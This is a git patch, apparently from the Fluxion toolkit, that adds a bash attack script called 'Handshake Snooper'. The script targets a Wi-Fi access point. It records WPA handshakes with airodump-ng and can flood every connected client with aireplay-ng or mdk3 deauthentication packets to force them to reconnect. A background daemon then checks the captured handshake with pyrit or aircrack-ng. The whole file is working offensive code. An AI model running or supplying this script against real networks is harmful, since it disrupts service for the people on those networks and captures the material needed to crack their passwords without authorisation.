From 708e5dc9d96695ff259d3f3f8d7a24511d1fe6ae Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 8 Aug 2017 13:21:46 -0500 Subject: [PATCH] Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired. --- attacks/Handshake Snooper/attack.sh | 172 ++++++++++++++++++++++++++++ 1 file changed, 172 insertions(+) create mode 100755 attacks/Handshake Snooper/attack.sh diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh new file mode 100755 index 0000000..5eb7ca3 --- /dev/null +++ b/attacks/Handshake Snooper/attack.sh @@ -0,0 +1,172 @@ +#!/bin/bash + +########################### < Handshake Snooper Parameters > ########################### + +HandshakeSnooperState="Not Ready" + +################################# < Handshake Snooper > ################################ +function handshake_verifier_daemon() { + if [ ${#@} -lt 5 ]; then return 1; fi + + handshakeVerifierState="running" + + function handle_verifier_abort() { + handshakeVerifierState="aborted" + } + + trap handle_verifier_abort SIGABRT + + source lib/HashUtils.sh + + local handshakeCheckResult=1 # Assume invalid + while [ $handshakeCheckResult -ne 0 -a "$handshakeVerifierState" = "running" ]; do + sleep 3 + pyrit -r $4 -o ${4/.cap/-clean.cap} stripLive + hash_check_handshake $3 ${4/.cap/-clean.cap} "${@:5:2}" + handshakeCheckResult=$? + done + + # If handshake didn't pass verification, it was aborted. + if [ $handshakeCheckResult -ne 0 ]; then return 1; fi + + mv "${4/.cap/-clean.cap}" "$2" + + # Signal parent process the verification terminated. + kill -s SIGABRT $1 +} + +function handshake_stop_verifier() { + if [ "$HANDSHAKEVerifierPID" ]; then + kill -s SIGABRT $HANDSHAKEVerifierPID &> $FLUXIONOutputDevice + fi + + HANDSHAKEVerifierPID="" +} + +# Parameters: path, SSID, MAC +function handshake_start_verifier() { + # if [ ${#@} -lt 3 ]; then return 1; fi + handshake_verifier_daemon $$ \ + $FLUXIONPath/attacks/Handshake\ Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap \ + $HANDSHAKEVerifier $FLUXIONWorkspacePath/capture/dump-01.cap \ + "$APTargetSSID" "$APTargetMAC" &> $FLUXIONOutputDevice & + HANDSHAKEVerifierPID=$! +} + +function handshake_stop_deauthenticator() { + if [ "$HANDSHAKEDeauthenticatorPID" ]; then + kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice + fi + + HANDSHAKEDeauthenticatorPID="" +} + +function handshake_start_deauthenticator() { + if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi + + case "$HANDSHAKEMethod" in + "aireplay-ng"*) xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ + aireplay-ng --deauth=9999999999 -a $APTargetMAC --ignore-negative-one $WIMonitor & + HANDSHAKEDeauthenticatorPID=$!;; + "mdk3"*) xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ + mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3.txt -c $APTargetChannel & + HANDSHAKEDeauthenticatorPID=$!;; + esac +} + +function handshake_stop_captor() { + if [ "$HANDSHAKECaptorPID" ]; then + kill $HANDSHAKECaptorPID &> $FLUXIONOutputDevice + fi + + HANDSHAKECaptorPID="" +} + +function handshake_start_captor() { + if [ "$HANDSHAKECaptorPID" ]; then return 0; fi + + xterm -hold -title "Handshake Captor (CH $APTargetChannel)" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e \ + airodump-ng -d $APTargetMAC -w $FLUXIONWorkspacePath/capture/dump -c $APTargetChannel -a $WIMonitor & + + sleep 3 + HANDSHAKECaptorPID=$(ps a | awk '$5~/^airodump-ng/ && $7~/'"$APTargetMAC"'/{print $1}') +} + +function handshake_unset_method() { + HANDSHAKEMethod="" +} + +function handshake_set_method() { + if [ "$HANDSHAKEMethod" ]; then return 0; fi + + local methods=("Monitor (${CYel}passive$CClr)" "aireplay-ng deauthentication (${CRed}aggressive$CClr)" "mdk3 deauthentication (${CRed}aggressive$CClr)" "$general_back") + io_query_choice "Select a method of handshake retrieval" methods[@] + + HANDSHAKEMethod=$IOQueryChoice + + if [ "$HANDSHAKEMethod" = "$general_back" ]; then + handshake_unset_method + return 1 + fi +} + +function handshake_unset_verifier() { + HANDSHAKEVerifier="" +} + +function handshake_set_verifier() { + if [ "$HANDSHAKEVerifier" ]; then return 0; fi + + local verifiers=("pyrit" "aircrack-ng" "$general_back") # "pyrit (${CGrn}recommended$CClr)" "aircrack-ng (unreliable)") + io_query_choice "Select a method of handshake retrieval" verifiers[@] + + HANDSHAKEVerifier=$IOQueryChoice + + if [ "$HANDSHAKEVerifier" = "$general_back" ]; then + handshake_unset_verifier + handshake_unset_method + return 1 + fi +} + +function unprep_attack() { + HandshakeSnooperState="Not Ready" + handshake_unset_verifier + handshake_unset_method + + sandbox_remove_workfile "$FLUXIONWorkspacePath/capture" +} + +function prep_attack() { + # if [ ${#@} -ne 3 ]; then return 1; fi + + mkdir $FLUXIONWorkspacePath/capture + + while true; do + handshake_set_method; if [ $? -ne 0 ]; then break; fi + handshake_set_verifier; if [ $? -ne 0 ]; then continue; fi + HandshakeSnooperState="Ready" + break + done + + # Check for handshake abortion. + if [ "$HandshakeSnooperState" = "Not Ready" ]; then + unprep_attack + return 1; + fi +} + +function stop_attack() { + handshake_stop_deauthenticator + handshake_stop_verifier + handshake_stop_captor + handshake_unset_verifier +} + +# Parameters: path, SSID, MAC +function start_attack() { + handshake_start_captor + handshake_start_deauthenticator + handshake_start_verifier +} +# FLUXSCRIPT END